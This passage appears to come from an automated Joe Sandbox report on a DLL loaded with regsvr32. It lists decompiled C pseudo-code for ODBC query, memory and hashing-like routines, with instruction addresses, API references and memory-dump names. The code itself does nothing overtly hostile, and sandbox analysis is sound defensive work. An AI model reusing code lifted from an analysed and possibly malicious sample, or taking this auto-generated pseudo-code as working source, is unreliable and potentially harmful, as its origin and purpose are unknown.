    							_t42 = _v40;
    							_t66 = _t66 + 1;
    						} while (_t66 < _t42);
    						goto L8;
    					}
    				}
    				return _t38;
    			}























    0x10008761
    0x10008767
    0x1000876e
    0x1000877d
    0x10008781
    0x10008782
    0x10008785
    0x1000878d
    0x10008793
    0x100087a0
    0x100087b0
    0x100087b3
    0x100087b5
    0x100087bc
    0x1000885d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x100087c2
    0x100087c2
    0x100087c6
    0x100087cb
    0x100087d0
    0x100087d5
    0x100087d6
    0x100087da
    0x100087db
    0x100087dd
    0x100087df
    0x100087df
    0x100087e2
    0x100087e3
    0x100087e6
    0x100087ee
    0x1000884c
    0x100087f0
    0x1000880a
    0x10008811
    0x10008816
    0x1000881b
    0x10008820
    0x10008825
    0x1000882b
    0x1000882f
    0x10008832
    0x10008833
    0x10008836
    0x10008836
    0x1000884f
    0x10008854
    0x10008855
    0x00000000
    0x100087c2
    0x1000878d
    0x10008864

    APIs
    • SQLNumResultCols.ODBC32(?,?), ref: 10008785
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 100087AE
    • SQLDescribeColW.ODBC32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?), ref: 100087E6
    • HeapAlloc.KERNEL32(00000000,?,?,00000001,00000000,00000000,?,?,?,?,?,?,?,?), ref: 10008805
    • SQLDescribeColW.ODBC32(?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 10008836
    • HeapAlloc.KERNEL32(00000000,00000002,?,00000001,00000000,00000000,?,?,?,?,?,?,?,?), ref: 10008847
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 45%
    			E10008909(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				void _v8;
    				char _v12;
    				void* _t16;
    				void* _t18;
    				char* _t19;
    				void* _t20;
    				void* _t25;
    				intOrPtr* _t29;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t16 =  &_v8;
    				_t29 = 0;
    				_push(_t16);
    				_push( *0x1002c53c);
    				_push(2);
    				L10007383();
    				if(_t16 == 0) {
    					_push(0xfffffffd);
    					_push(_a16);
    					_push(0xfffffffd);
    					_push(_a12);
    					_push(0xfffffffd);
    					_push(_a8);
    					_push(_v8);
    					L100073AD();
    					_t18 = _t16;
    					if(_t18 == 0 || _t18 == 1) {
    						_t19 =  &_v12;
    						_push(_t19);
    						_push(_v8);
    						_push(3);
    						L10007383();
    						if(_t19 != 0) {
    							goto L4;
    						} else {
    							_t20 = HeapAlloc( *0x10028080, 8, 0x20);
    							_t29 = _a4;
    							_t25 = _t20;
    							 *((intOrPtr*)(_t25 + 8)) = _v12;
    							 *_t25 = _v8;
    							 *_t29 = 0x1002c540;
    							 *(_t29 + 4) = _t25;
    						}
    					} else {
    						E10008B11(__ecx, _v8, 2);
    						L4:
    						_push(_v8);
    						L100073B3();
    						_push(_v8);
    						_push(2);
    						L1000739B();
    					}
    				}
    				return _t29;
    			}











    0x1000890c
    0x1000890d
    0x1000890f
    0x10008912
    0x10008914
    0x10008915
    0x1000891b
    0x1000891d
    0x10008925
    0x10008927
    0x10008929
    0x1000892c
    0x1000892e
    0x10008931
    0x10008933
    0x10008936
    0x10008939
    0x1000893e
    0x10008941
    0x1000896f
    0x10008972
    0x10008973
    0x10008976
    0x10008978
    0x10008980
    0x00000000
    0x10008982
    0x1000898c
    0x10008992
    0x10008995
    0x1000899a
    0x100089a0
    0x100089a2
    0x100089a8
    0x100089a8
    0x10008948
    0x1000894d
    0x10008954
    0x10008954
    0x10008957
    0x1000895c
    0x1000895f
    0x10008961
    0x10008961
    0x10008941
    0x1000896c

    APIs
    • SQLAllocHandle.ODBC32(00000002,?), ref: 1000891D
    • SQLConnectW.ODBC32(?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008939
    • SQLDisconnect.ODBC32(?,00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008957
    • SQLFreeHandle.ODBC32(00000002,?,?,00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008961
    • SQLAllocHandle.ODBC32(00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 10008978
    • HeapAlloc.KERNEL32(00000008,00000020,00000003,?,?,?,?,000000FD,?,000000FD,?,000000FD,00000002,?), ref: 1000898C
      • Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 95%
    			E10010BB0() {
    				signed int _t46;
    				signed int _t47;
    				unsigned int _t57;
    				signed int _t60;
    				signed int _t64;
    				void* _t66;
    				int _t69;
    				signed int _t70;
    				void* _t71;
    				void* _t72;
    				signed int _t73;
    				signed int _t77;
    				unsigned int _t84;
    				signed char* _t85;
    				unsigned int _t86;
    				signed int _t87;
    				int _t88;
    				unsigned int _t92;
    				void* _t95;
    				void* _t97;
    				signed int _t98;
    				void* _t99;
    				signed int _t100;
    				void* _t101;
    				signed int _t103;
    				void* _t104;
    				void* _t106;
    
    				_t46 =  *(_t104 + 0xc);
    				_t100 =  *(_t104 + 0xc);
    				_t87 =  *(_t104 + 0x24);
    				_t69 = _t46 *  *(_t104 + 0x18) * _t87;
    				 *(_t104 + 0x24) = _t69;
    				if( *(_t100 + 0x5c) >= _t69) {
    					L5:
    					_t84 =  *(_t104 + 0x20);
    					_t70 = 0;
    					_t72 =  *(_t100 + 0x58);
    					__eflags = _t84;
    					if(_t84 != 0) {
    						_t103 =  *(_t104 + 0x18);
    						do {
    							_t98 = 0;
    							__eflags = _t46;
    							if(_t46 != 0) {
    								do {
    									_t64 =  *( *((intOrPtr*)(_t103 + _t98 * 4)) + _t70 * 4);
    									__eflags = _t87;
    									if(_t87 != 0) {
    										_t86 = _t87;
    										do {
    											 *_t72 = _t64;
    											_t72 = _t72 + 1;
    											_t64 = _t64 >> 8;
    											_t86 = _t86 - 1;
    											__eflags = _t86;
    										} while (_t86 != 0);
    									}
    									_t46 =  *(_t104 + 0x1c);
    									_t98 = _t98 + 1;
    									__eflags = _t98 - _t46;
    								} while (_t98 < _t46);
    								_t84 =  *(_t104 + 0x20);
    							}
    							_t70 = _t70 + 1;
    							__eflags = _t70 - _t84;
    						} while (_t70 < _t84);
    						_t100 =  *(_t104 + 0x14);
    					}
    					_t73 =  *(_t100 + 0x10);
    					_t88 =  *(_t104 + 0x24);
    					_t71 =  *(_t100 + 0x58);
    					_t47 = _t73 + _t88;
    					 *(_t100 + 0x10) = _t47;
    					__eflags = _t47 - _t73;
    					if(_t47 < _t73) {
    						_t28 = _t100 + 0x14;
    						 *_t28 =  *(_t100 + 0x14) + 1;
    						__eflags =  *_t28;
    					}
    					_t95 = 0x40 - (_t73 & 0x0000003f);
    					__eflags = 0x40 - _t88;
    					if(0x40 <= _t88) {
    						memcpy(_t100 - 0x40 + 0x58, _t71, 0x40);
    						_t101 = _t100 + 0x18;
    						E100114F0(_t101, 0x10);
    						_push(_t101);
    						_push( *((intOrPtr*)(_t104 + 0x2c)));
    						E10010E60();
    						_t88 = _t88 - 0x40;
    						_t104 = _t104 + 0x1c;
    						_t71 = _t71 + _t95;
    						 *(_t104 + 0x24) = _t88;
    						__eflags = _t88 - 0x40;
    						if(_t88 >= 0x40) {
    							_t57 = _t88 >> 6;
    							__eflags = _t57;
    							 *(_t104 + 0x1c) = _t57;
    							do {
    								__eflags =  *0x1002c378;
    								memcpy(_t101, _t71, 0x10 << 2);
    								_t106 = _t104 + 0xc;
    								_t92 = 0x10;
    								_t97 = _t101;
    								if(__eflags != 0) {
    									_t85 = _t97 + 2;
    									do {
    										_t77 = _t85[1] & 0x000000ff;
    										_t97 = _t97 + 4;
    										_t60 =  *_t85 & 0x000000ff;
    										_t85 =  &(_t85[4]);
    										 *(_t97 - 4) = ((_t77 << 0x00000008 | _t60) << 0x00000008 |  *(_t85 - 5) & 0x000000ff) << 0x00000008 |  *(_t85 - 6) & 0x000000ff;
    										_t92 = _t92 - 1;
    										__eflags = _t92;
    									} while (_t92 != 0);
    								}
    								_push(_t101);
    								_push( *((intOrPtr*)(_t106 + 0x18)));
    								E10010E60();
    								_t104 = _t106 + 8;
    								_t88 =  *((intOrPtr*)(_t106 + 0x2c)) - 0x40;
    								_t71 = _t71 + 0x40;
    								_t43 = _t104 + 0x1c;
    								 *_t43 =  *(_t104 + 0x1c) - 1;
    								__eflags =  *_t43;
    								 *(_t104 + 0x24) = _t88;
    							} while ( *_t43 != 0);
    						}
    					} else {
    						_t101 = _t100 - _t95 + 0x58;
    					}
    					memcpy(_t101, _t71, _t88);
    					return 1;
    				} else {
    					_t99 = realloc( *(_t100 + 0x58), _t69);
    					_t104 = _t104 + 8;
    					if(_t99 != 0) {
    						L4:
    						_t46 =  *(_t104 + 0x1c);
    						 *(_t100 + 0x58) = _t99;
    						 *(_t100 + 0x5c) = _t69;
    						goto L5;
    					} else {
    						free( *(_t100 + 0x58));
    						_t66 = malloc(_t69);
    						_t104 = _t104 + 8;
    						 *(_t100 + 0x58) = _t66;
    						if(_t66 != 0) {
    							goto L4;
    						} else {
    							return _t66;
    						}
    					}
    				}
    			}






























    0x10010bb0
    0x10010bb6
    0x10010bc3
    0x10010bc7
    0x10010bca
    0x10010bd1
    0x10010c0f
    0x10010c0f
    0x10010c13
    0x10010c15
    0x10010c18
    0x10010c1a
    0x10010c1c
    0x10010c20
    0x10010c20
    0x10010c22
    0x10010c24
    0x10010c26
    0x10010c2a
    0x10010c2d
    0x10010c2f
    0x10010c31
    0x10010c33
    0x10010c33
    0x10010c35
    0x10010c36
    0x10010c39
    0x10010c39
    0x10010c39
    0x10010c33
    0x10010c3c
    0x10010c40
    0x10010c41
    0x10010c41
    0x10010c45
    0x10010c45
    0x10010c49
    0x10010c4a
    0x10010c4a
    0x10010c4e
    0x10010c4e
    0x10010c52
    0x10010c55
    0x10010c59
    0x10010c5c
    0x10010c5f
    0x10010c62
    0x10010c64
    0x10010c66
    0x10010c66
    0x10010c66
    0x10010c66
    0x10010c71
    0x10010c73
    0x10010c75
    0x10010c8b
    0x10010c90
    0x10010c96
    0x10010c9b
    0x10010c9c
    0x10010ca0
    0x10010ca5
    0x10010ca7
    0x10010caa
    0x10010cac
    0x10010cb0
    0x10010cb3
    0x10010cb7
    0x10010cb7
    0x10010cba
    0x10010cc0
    0x10010cc0
    0x10010cd0
    0x10010cd0
    0x10010cd2
    0x10010cd7
    0x10010cd9
    0x10010cdb
    0x10010ce0
    0x10010ce0
    0x10010ce4
    0x10010ce7
    0x10010cea
    0x10010d04
    0x10010d07
    0x10010d07
    0x10010d07
    0x10010ce0
    0x10010d0a
    0x10010d0b
    0x10010d0f
    0x10010d18
    0x10010d1b
    0x10010d1e
    0x10010d21
    0x10010d21
    0x10010d21
    0x10010d25
    0x10010d25
    0x10010cc0
    0x10010c77
    0x10010c79
    0x10010c79
    0x10010d2e
    0x10010d3f
    0x10010bd3
    0x10010bdd
    0x10010bdf
    0x10010be4
    0x10010c05
    0x10010c05
    0x10010c09
    0x10010c0c
    0x00000000
    0x10010be6
    0x10010be9
    0x10010bf0
    0x10010bf6
    0x10010bf9
    0x10010bfe
    0x00000000
    0x10010c04
    0x10010c04
    0x10010c04
    0x10010bfe
    0x10010be4

    APIs
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 86%
    			E1000B5B0() {
    				intOrPtr _t49;
    				signed int _t53;
    				void* _t55;
    				intOrPtr _t59;
    				void* _t72;
    				void* _t74;
    				intOrPtr _t80;
    				intOrPtr* _t83;
    				intOrPtr* _t84;
    				void* _t86;
    				signed int _t88;
    				struct _IO_FILE* _t89;
    				intOrPtr* _t90;
    				signed int _t91;
    				void* _t92;
    				void* _t93;
    				void* _t94;
    
    				_t90 =  *((intOrPtr*)(_t92 + 0xc));
    				_t91 = 0;
    				if( *((intOrPtr*)( *_t90)) != 9) {
    					E10010D40( *((intOrPtr*)(_t90 + 4)) + 0xe7c,  *((intOrPtr*)(_t90 + 4)) + 0xe1c);
    					_t49 =  *((intOrPtr*)(_t90 + 4));
    					_t93 = _t92 + 8;
    					__eflags =  *(_t49 + 0xfc);
    					if( *(_t49 + 0xfc) != 0) {
    						_t74 =  *(_t49 + 0x1c4);
    						__eflags = _t74;
    						if(_t74 != 0) {
    							free(_t74);
    							_t93 = _t93 + 4;
    							 *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)) + 0x1c4)) = 0;
    							 *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)) + 0xfc)) = 0;
    						}
    					}
    					E1000FA00( *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)) + 0x3c)));
    					_t94 = _t93 + 4;
    					_t86 = 0x40;
    					do {
    						_t53 =  *(_t86 +  *((intOrPtr*)(_t90 + 4)));
    						__eflags = _t53;
    						if(_t53 != 0) {
    							_t72 = _t53 + 0xfffffff0;
    							__eflags = _t72;
    							free(_t72);
    							_t94 = _t94 + 4;
    							 *(_t86 +  *((intOrPtr*)(_t90 + 4))) = _t91;
    						}
    						_t55 =  *(_t86 +  *((intOrPtr*)(_t90 + 4)) + 0xdb0);
    						__eflags = _t55;
    						if(_t55 != 0) {
    							free(_t55);
    							_t94 = _t94 + 4;
    							 *(_t86 +  *((intOrPtr*)(_t90 + 4)) + 0x20) = _t91;
    							 *(_t86 +  *((intOrPtr*)(_t90 + 4)) + 0xdb0) = _t91;
    						}
    						_t86 = _t86 + 4;
    						__eflags = _t86 - 0x60;
    					} while (_t86 < 0x60);
    					 *( *((intOrPtr*)(_t90 + 4)) + 0xe0) = _t91;
    					 *( *((intOrPtr*)(_t90 + 4)) + 0xe4) = _t91;
    					__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)))) - _t91;
    					if( *((intOrPtr*)( *((intOrPtr*)(_t90 + 4)))) != _t91) {
    						__eflags =  *_t90 + 0x20;
    						E10011530( *_t90 + 0x20,  *_t90 + 0x20);
    						_t94 = _t94 + 4;
    					}
    					_t59 =  *((intOrPtr*)(_t90 + 4));
    					__eflags =  *(_t59 + 0x38) - _t91;
    					if( *(_t59 + 0x38) != _t91) {
    						_t89 =  *(_t59 + 0x38);
    						__imp____p__iob();
    						__eflags = _t89 - _t59;
    						if(_t89 != _t59) {
    							fclose(_t89);
    							_t94 = _t94 + 4;
    						}
    						 *( *((intOrPtr*)(_t90 + 4)) + 0x38) = _t91;
    					}
    					_t80 =  *((intOrPtr*)(_t90 + 4));
    					__eflags =  *((intOrPtr*)(_t80 + 0xe10)) - _t91;
    					if( *((intOrPtr*)(_t80 + 0xe10)) != _t91) {
    						_t84 = _t80 + 0xe7c;
    						_t88 = 0xc;
    						_t83 = _t80 + 0x138;
    						while(1) {
    							__eflags =  *_t83 -  *_t84;
    							if( *_t83 !=  *_t84) {
    								break;
    							}
    							_t83 = _t83 + 4;
    							_t84 = _t84 + 4;
    							_t88 = _t88 - 4;
    							__eflags = _t88;
    							if(_t88 >= 0) {
    								continue;
    							} else {
    							}
    							goto L23;
    						}
    						_t91 = 1;
    					}
    					L23:
    					 *((intOrPtr*)(_t80 + 0xe18)) = 0;
    					E1000F670(_t90);
    					 *((intOrPtr*)( *_t90)) = 9;
    					__eflags = _t91;
    					_t44 = _t91 == 0;
    					__eflags = _t44;
    					return 0 | _t44;
    				} else {
    					_t2 = _t91 + 1; // 0x1
    					return _t2;
    				}
    			}




















    0x1000b5b2
    0x1000b5b6
    0x1000b5bd
    0x1000b5d8
    0x1000b5dd
    0x1000b5e0
    0x1000b5e9
    0x1000b5ef
    0x1000b5f1
    0x1000b5f7
    0x1000b5f9
    0x1000b5fc
    0x1000b601
    0x1000b604
    0x1000b60d
    0x1000b60d
    0x1000b5f9
    0x1000b619
    0x1000b61e
    0x1000b621
    0x1000b626
    0x1000b629
    0x1000b62c
    0x1000b62e
    0x1000b630
    0x1000b630
    0x1000b634
    0x1000b639
    0x1000b63c
    0x1000b63c
    0x1000b642
    0x1000b649
    0x1000b64b
    0x1000b64e
    0x1000b653
    0x1000b656
    0x1000b65d
    0x1000b65d
    0x1000b664
    0x1000b667
    0x1000b667
    0x1000b66f
    0x1000b678
    0x1000b681
    0x1000b683
    0x1000b687
    0x1000b68b
    0x1000b690
    0x1000b690
    0x1000b693
    0x1000b696
    0x1000b699
    0x1000b69b
    0x1000b69e
    0x1000b6a4
    0x1000b6a6
    0x1000b6a9
    0x1000b6af
    0x1000b6af
    0x1000b6b5
    0x1000b6b5
    0x1000b6b8
    0x1000b6bb
    0x1000b6c1
    0x1000b6c3
    0x1000b6c9
    0x1000b6ce
    0x1000b6d4
    0x1000b6d6
    0x1000b6d8
    0x00000000
    0x00000000
    0x1000b6da
    0x1000b6dd
    0x1000b6e0
    0x1000b6e0
    0x1000b6e3
    0x00000000
    0x00000000
    0x1000b6e5
    0x00000000
    0x1000b6e3
    0x1000b6e7
    0x1000b6e7
    0x1000b6ec
    0x1000b6ed
    0x1000b6f7
    0x1000b702
    0x1000b70b
    0x1000b70e
    0x1000b70e
    0x1000b712
    0x1000b5c0
    0x1000b5c0
    0x1000b5c4
    0x1000b5c4

    APIs
      • Part of subcall function 10010D40: memset.MSVCRT ref: 10010D66
      • Part of subcall function 10010D40: memset.MSVCRT ref: 10010D89
      • Part of subcall function 10010D40: free.MSVCRT(?), ref: 10010DEE
    • free.MSVCRT(?), ref: 1000B5FC
      • Part of subcall function 1000FA00: free.MSVCRT(?,?,1000B61E,?), ref: 1000FA0C
    • free.MSVCRT(?), ref: 1000B634
    • free.MSVCRT(?), ref: 1000B64E
    • __p__iob.MSVCRT ref: 1000B69E
    • fclose.MSVCRT ref: 1000B6A9
      • Part of subcall function 1000F670: memset.MSVCRT ref: 1000F6E8
      • Part of subcall function 10011530: free.MSVCRT(1000B698,?), ref: 100120C0
      • Part of subcall function 10011530: free.MSVCRT(?,?), ref: 100120D0
      • Part of subcall function 10011530: free.MSVCRT(?,?), ref: 100120E0
      • Part of subcall function 10011530: memset.MSVCRT ref: 100120F0
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 59%
    			E100086CF(char _a4, wchar_t* _a8) {
    				signed short _t10;
    				signed int _t12;
    				signed short _t13;
    				signed int _t14;
    				char* _t15;
    				intOrPtr _t17;
    				intOrPtr* _t26;
    				void* _t27;
    
    				_t26 = _a4;
    				_t17 = 0;
    				_t10 = _t26 + 8;
    				 *((intOrPtr*)(_t26 + 0x14)) = 0;
    				_t27 =  *_t10;
    				if(_t27 != 0 && _a8 != 0) {
    					_push(_t10);
    					_push( *_t26);
    					_push(3);
    					L10007383();
    					_t12 = _t10 & 0x0000ffff;
    					if(_t12 == 0 || _t12 == 1) {
    						_t13 = wcslen(_a8);
    						_push(_t13);
    						_push(_a8);
    						_push(_t27);
    						L1000738F();
    						_t14 = _t13 & 0x0000ffff;
    						if(_t14 == 0 || _t14 == 1) {
    							_t15 =  &_a4;
    							_t17 = 1;
    							_push(_t15);
    							_push(_t27);
    							L10007395();
    							if(_t15 == 0) {
    								 *((intOrPtr*)(_t26 + 0x14)) = _a4;
    							}
    						} else {
    							E10008B11(1, _t27, 3);
    						}
    						_push(_t27);
    						_push(3);
    						L1000739B();
    					}
    				}
    				return _t17;
    			}











    0x100086d5
    0x100086d8
    0x100086da
    0x100086dd
    0x100086e0
    0x100086e4
    0x100086eb
    0x100086ec
    0x100086ee
    0x100086f0
    0x100086f7
    0x100086fe
    0x10008708
    0x1000870e
    0x1000870f
    0x10008712
    0x10008713
    0x1000871a
    0x10008721
    0x10008734
    0x10008737
    0x10008739
    0x1000873a
    0x1000873b
    0x10008743
    0x10008748
    0x10008748
    0x10008728
    0x1000872b
    0x10008731
    0x1000874b
    0x1000874c
    0x1000874e
    0x1000874e
    0x100086fe
    0x10008759

    APIs
    • SQLAllocHandle.ODBC32(00000003,?,?), ref: 100086F0
    • wcslen.MSVCRT ref: 10008708
    • SQLExecDirectW.ODBC32(?,?,00000000,00000003,?,?), ref: 10008713
    • SQLFreeHandle.ODBC32(00000003,?,?,?,?,?,00000000,00000003,?,?), ref: 1000874E
      • Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37
    • SQLRowCount.ODBC32(?,?,?,?,00000000,00000003,?,?), ref: 1000873B
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 51%
    			E10008656(intOrPtr* _a4, wchar_t* _a8, signed char _a12) {
    				signed short _t16;
    				signed int _t17;
    				intOrPtr* _t20;
    				void* _t26;
    				intOrPtr* _t27;
    
    				_t27 = _a4;
    				_t26 = 0;
    				E10008EA1(_t27);
    				_t20 = _t27 + 8;
    				_push(_t20);
    				_push( *_t27);
    				 *((intOrPtr*)(_t27 + 4)) =  *_t20;
    				_push(3);
    				L10007383();
    				if(_a8 != 0) {
    					if((_a12 & 0x00000001) != 0) {
    						_push(0xfffffffa);
    						_push(2);
    						_push(6);
    						_push( *((intOrPtr*)(_t27 + 4)));
    						L10007389();
    					}
    					_t16 = wcslen(_a8);
    					_push(_t16);
    					_push(_a8);
    					_push( *((intOrPtr*)(_t27 + 4)));
    					L1000738F();
    					_t17 = _t16 & 0x0000ffff;
    					if(_t17 == 0 || _t17 == 1) {
    						_t26 = 1;
    					} else {
    						E10008B11(1,  *((intOrPtr*)(_t27 + 4)), 3);
    					}
    				}
    				return _t26;
    			}








    0x1000865a
    0x1000865f
    0x10008661
    0x10008667
    0x1000866c
    0x1000866d
    0x1000866f
    0x10008672
    0x10008674
    0x1000867c
    0x10008682
    0x10008684
    0x10008686
    0x10008688
    0x1000868a
    0x1000868d
    0x1000868d
    0x10008695
    0x1000869b
    0x1000869c
    0x1000869f
    0x100086a2
    0x100086a9
    0x100086b0
    0x100086c5
    0x100086b7
    0x100086bc
    0x100086c2
    0x100086b0
    0x100086cc

    APIs
      • Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EC8
      • Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EDE
      • Part of subcall function 10008EA1: SQLFreeHandle.ODBC32(00000003,?,?,?,10008666,?), ref: 10008EED
    • SQLAllocHandle.ODBC32(00000003,?,?), ref: 10008674
    • SQLSetStmtAttrW.ODBC32(?,00000006,00000002,000000FA,00000003,?,?), ref: 1000868D
    • wcslen.MSVCRT ref: 10008695
    • SQLExecDirectW.ODBC32(?,?,00000000,00000003,?,?), ref: 100086A2
      • Part of subcall function 10008B11: SQLGetDiagFieldW.ODBC32(?,?,00000001,00000006,10028168,00004000,?,?,00000001,?,100086C1,?,00000003,?,?,00000000), ref: 10008B37
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 43%
    			E10008C07(void* _a4) {
    				void* _t6;
    
    				_t6 = _a4;
    				E10008EA1(_t6);
    				_push( *((intOrPtr*)(_t6 + 8)));
    				_push(3);
    				L1000739B();
    				_push( *_t6);
    				L100073B3();
    				_push( *_t6);
    				_push(2);
    				L1000739B();
    				return HeapFree( *0x10028080, 0, _t6);
    			}




    0x10008c08
    0x10008c0d
    0x10008c13
    0x10008c16
    0x10008c18
    0x10008c1d
    0x10008c1f
    0x10008c24
    0x10008c26
    0x10008c28
    0x10008c3d

    APIs
      • Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EC8
      • Part of subcall function 10008EA1: HeapFree.KERNEL32(00000000,?,00000000), ref: 10008EDE
      • Part of subcall function 10008EA1: SQLFreeHandle.ODBC32(00000003,?,?,?,10008666,?), ref: 10008EED
    • SQLFreeHandle.ODBC32(00000003,?), ref: 10008C18
    • SQLDisconnect.ODBC32(?,00000003,?), ref: 10008C1F
    • SQLFreeHandle.ODBC32(00000002,?,?,00000003,?), ref: 10008C28
    • HeapFree.KERNEL32(00000000,?,00000002), ref: 10008C36
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E1000B090(void* __ecx, void** _a4, wchar_t* _a8) {
    				int _v8;
    				void* _t40;
    				void* _t43;
    				void* _t45;
    
    				_v8 = 0;
    				if(_a8 == 0) {
    					if( *_a4 != 0) {
    						_t40 =  *0x1002c5c0; // 0x8b0000
    						HeapFree(_t40, 0,  *_a4);
    						 *_a4 = 0;
    					}
    				} else {
    					_v8 = wcslen(_a8);
    					if( *_a4 != 0) {
    						_t12 = _v8 + 0xa; // 0xa
    						_t43 =  *0x1002c5c0; // 0x8b0000
    						 *_a4 = HeapReAlloc(_t43, 0,  *_a4, _v8 + _t12);
    					} else {
    						_t8 = _v8 + 0xa; // 0xa
    						_t45 =  *0x1002c5c0; // 0x8b0000
    						 *_a4 = HeapAlloc(_t45, 0, _v8 + _t8);
    					}
    					E1000B260(_a8,  *_a4, _a8, _v8);
    				}
    				return _v8 + _v8 + 2;
    			}







    0x1000b094
    0x1000b09f
    0x1000b113
    0x1000b11d
    0x1000b124
    0x1000b12d
    0x1000b12d
    0x1000b0a1
    0x1000b0ad
    0x1000b0b6
    0x1000b0d9
    0x1000b0e6
    0x1000b0f6
    0x1000b0b8
    0x1000b0bb
